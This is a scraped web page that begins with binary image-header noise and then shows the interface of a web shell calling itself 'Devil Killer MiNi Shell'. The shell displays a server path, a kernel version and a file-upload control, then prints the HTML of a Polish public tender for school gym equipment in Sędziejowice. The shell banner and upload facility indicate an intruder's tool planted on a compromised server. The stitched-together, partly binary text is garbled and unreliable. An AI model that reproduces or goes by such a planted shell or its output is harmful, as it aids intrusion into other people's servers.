JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231213/0055093601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa wyposażenia i pomocy dydaktycznych do sali gimnastycznej <br/>w Zespole Szkół Centrum Kształcenia Rolniczego im. Władysława Grabskiego <br/>w Sędziejowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Centrum Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000095615</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolonia 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sędziejowice-Kolonia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-160</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">43 6771004</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zsckrsedziejowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zsrgrabski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa wyposażenia i pomocy dydaktycznych do sali gimnastycznej <br/>w Zespole Szkół Centrum Kształcenia Rolniczego im. Władysława Grabskiego <br/>w Sędziejowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0bb712a0-99ed-11ee-ba3b-4e891c384685</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00550936</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00122011/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.8 Dostawa wyposażenia i pomocy dydaktycznych do sali gimnastycznej w Zespole Szkół Centrum Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zsrgrabski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zsrgrabski</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie zakupowej - platformazakupowa.pl.<br/>2. Szczegółowa instrukcja dla Wykonawców dotycząca złożenia, zmiany i wycofania oferty znajduje się na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>3. Ofertę należy złożyć, pod rygorem nieważności, poprzez platformazakupowa.pl pod adresem: https://www.platformazakupowa.pl/pn/zsrgrabski:<br/>a) w formie elektronicznej<br/>lub<br/>b) w postaci elektronicznej.<br/>4. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, e-mail: Zamawiający dopuszcza, awaryjnie, komunikację z Wykonawcami za pomocą poczty elektronicznej, e-mail: przetargi@zsckrsedziejowice.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych Wykonawcy jest - Dyrektor Zespołu Szkół Centrum<br/>Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach, Sędziejowice - Kolonia 10, 98 - 160 Sędziejowice.<br/>Zamawiający wyznaczył inspektora ochrony danych. Telefon do szkoły - 43 677 10 04. Adres email -<br/>sekretariat@zsrgrabski.pl<br/>2. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego<br/>postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek<br/>prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na Zamawiającym – w oparciu o<br/>przepisy ustawy Prawo zamówień publicznych oraz aktów wykonawczych do Pzp.<br/>3. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 Pzp.<br/>4. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres 4 lat od dnia zakończenia postępowania<br/>o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>5. Obowiązek podania przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem ustawowym<br/>określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z Pzp.<br/>6. Państwa dane osobowe nie będą przetwarzane w sposób zautomatyzowany oraz nie będą podlegały profilowaniu, stosowanie do<br/>art. 22 RODO.<br/>7. Do Państwa danych osobowych mogą mieć dostęp, wyłącznie na podstawie zawartych umów powierzenia przetwarzania,<br/>podmioty zewnętrzne realizujące usługi na rzecz zamawiającego w szczególności Open Nexus Sp. z o.o. z siedzibą w Poznaniu, ul.<br/>Bolesława Krzywoustego 3.<br/>8. W związku z przetwarzaniem Państwa danych osobowych jesteście Państwo uprawnieni do:<br/>8.1. dostępu do swoich danych osobowych – na podstawie art. 15 RODO,<br/>8.2. sprostowania lub uzupełnienia swoich danych osobowych – na podstawie art. 16 RODO, przy czym skorzystanie z prawa do<br/>sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>8.3. żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art.<br/>18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na<br/>ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postępowania o udzielenie zamówienia,<br/>8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych<br/>osobowych Państwa dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">9. Nie przysługuje Państwu:9.1. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>9.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO.<br/>10. Jednocześnie Zamawiający przypomina o ciążącym na Państwu obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z<br/>wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSCKR.20.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I – Wyposażenie<br/>• Siatka ochronna polietylenowa, oczka 50 x 50 mm, gr. splotu 3 mm,<br/>• Siatka ochronna polipropylenowa z obciążnikiem dolnej krawędzi, oczka 50 x 50 mm, gr. splotu <br/>4 mm,<br/>• Wspornik narożny piłkochwytu,<br/>• Wspornik pośredni piłkochwytu,<br/>• Konstrukcja do koszykówki uchylna składana w bok na ścianę, wysięg 120 cm, mocowana <br/>bezpośrednio do słupa,<br/>• Tablica do koszykówki 90x120 cm, szkło akrylowe gr. 10 mm z ramą metalową malowaną <br/>proszkowo, bezotworowy system mocowania szkła akrylowego do ramy metalowej,<br/>• Osłona dolnej krawędzi do tablicy 90 x 120 cm,<br/>• Obręcz do koszykówki stała z wzmocnieniem, malowana<br/>• Siatka do obręczy o gr. 6 mm<br/>• Materac osłonowy, konstrukcja ze sklejki, grubość materaca 5 cm,<br/>• Słupki do tenisa profesjonalne aluminiowe, profil 116/76 mm z wewnętrznym naciągiem,<br/>• Słupki do badmintona turniejowe, przejezdne z obciążeniem 30 kg. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37450000-7 - Sprzęt do sportów uprawianych na boiskach lub na kortach</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.a.i.1. Zamawiający powołał Komisję Przetargową do przygotowania i przeprowadzenia <br/>postępowania o udzielenie zamówienia w tym m.in. do oceny spełniania przez Wykonawców <br/>warunków udziału w postępowaniu oraz do badania i oceny ofert.<br/>1.a.i.2. Zamawiający przy pomocy Komisji Przetargowej:<br/>1.a.i.1.a) dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu;<br/>1.a.i.1.b) dokona badania i oceny ofert, wg przyjętych kryteriów;<br/>1.a.i.1.c) odrzuci ofertę, w przypadku stwierdzenia, że zachodzą okoliczności określone w art. 226 <br/>ust. 1 ustawy Pzp. 3. Zamawiający poprawi w ofercie:<br/>1.a.i.1.a) oczywiste omyłki pisarskie,<br/>1.a.i.1.b) oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych <br/>dokonanych poprawek,<br/>1.a.i.1.c) inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, <br/>niepowodujące istotnych zmian w treści oferty<br/>‒ niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.<br/>1.a.i.4. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>1.a.i.5. W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty <br/>ze względu na to, że zostały złożone oferty o takiej samej cenie, wezwie on Wykonawców, <br/>którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert <br/>dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą <br/>zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>1.a.i.6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień <br/>dotyczących treści złożonych ofert oraz przedmiotowych środków dowodowych lub innych <br/>składanych dokumentów lub oświadczeń. <br/>1.a.i.7. Niedopuszczalne jest prowadzenie między Zamawiającym a Wykonawcą negocjacji <br/>dotyczących złożonej oferty oraz, z uwzględnieniem art. 223 ust. 2 i art. 187, dokonywanie <br/>jakiejkolwiek zmiany w jej treści. <br/>1.a.i.8. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez <br/>Zamawiającego.<br/>1.a.i.9. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym <br/>w SWZ.<br/>1.a.i.10. Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający <br/>wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia pisemnej zgody <br/>na wybór jego oferty.<br/>1.a.i.11. W przypadku braku zgody, o której mowa w ust. 10, oferta podlega odrzuceniu, a <br/>Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta <br/>została najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II – Pomoce dydaktyczne<br/>• Skrzynia gimnastyczna 5-częściowa z wózkiem, pokrycie skóra syntetyczna,<br/>• Kozioł gimnastyczny z regulacja wysokości, pokrycie skóra syntetyczna,<br/>• Piłka nożna halowa rozm. 4,<br/>• Piłka ręczna rozm. 3,<br/>• Piłka do koszykówki,<br/>• Piłka do siatkówki rozm. 5,<br/>• Siatka tenisa ziemnego gr. splotu 3 mm PE,<br/>• Rakieta do tenisa ziemnego,<br/>• Bieżnia<br/>• Orbitrek Magnetyczny,<br/>• Rower treningowy elektromagnetyczny,<br/>• Siatka do badmintona,<br/>• Zestaw do badmintona (rakietki + pokrowiec),<br/>• Lotki do badmintona piórkowe,<br/>• Step do aerobiku o zbliżonych wymiarach: 67x27,5 cm. Wysokość: regulowana: 10,5; 15; 20 cm. <br/>Waga: 2,75 kg. Maksymalne obciążenie: 250 kg,<br/>• Hantle fitness 0,5 kg,<br/>• Lina treningowa do crossfitu 9m,<br/>• Zestaw taśm rehabilitacyjnych,<br/>• Drabinka gimnastyczna przyścienna 180 x 300 cm – podwójna,<br/>• Belka mocująca drabinki gimnastyczne wraz z wspornikami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37400000-2 - Artykuły i sprzęt sportowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.a.i.1. Zamawiający powołał Komisję Przetargową do przygotowania i przeprowadzenia <br/>postępowania o udzielenie zamówienia w tym m.in. do oceny spełniania przez Wykonawców <br/>warunków udziału w postępowaniu oraz do badania i oceny ofert.<br/>1.a.i.2. Zamawiający przy pomocy Komisji Przetargowej:<br/>1.a.i.1.a) dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu;<br/>1.a.i.1.b) dokona badania i oceny ofert, wg przyjętych kryteriów;<br/>1.a.i.1.c) odrzuci ofertę, w przypadku stwierdzenia, że zachodzą okoliczności określone w art. 226 <br/>ust. 1 ustawy Pzp. 3. Zamawiający poprawi w ofercie:<br/>1.a.i.1.a) oczywiste omyłki pisarskie,<br/>1.a.i.1.b) oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych <br/>dokonanych poprawek,<br/>1.a.i.1.c) inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, <br/>niepowodujące istotnych zmian w treści oferty<br/>‒ niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.<br/>1.a.i.4. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>1.a.i.5. W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty <br/>ze względu na to, że zostały złożone oferty o takiej samej cenie, wezwie on Wykonawców, <br/>którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert <br/>dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą <br/>zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>1.a.i.6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień <br/>dotyczących treści złożonych ofert oraz przedmiotowych środków dowodowych lub innych <br/>składanych dokumentów lub oświadczeń. <br/>1.a.i.7. Niedopuszczalne jest prowadzenie między Zamawiającym a Wykonawcą negocjacji <br/>dotyczących złożonej oferty oraz, z uwzględnieniem art. 223 ust. 2 i art. 187, dokonywanie <br/>jakiejkolwiek zmiany w jej treści. <br/>1.a.i.8. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez <br/>Zamawiającego.<br/>1.a.i.9. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym <br/>w SWZ.<br/>1.a.i.10. Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający <br/>wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia pisemnej zgody <br/>na wybór jego oferty.<br/>1.a.i.11. W przypadku braku zgody, o której mowa w ust. 10, oferta podlega odrzuceniu, a <br/>Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta <br/>została najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 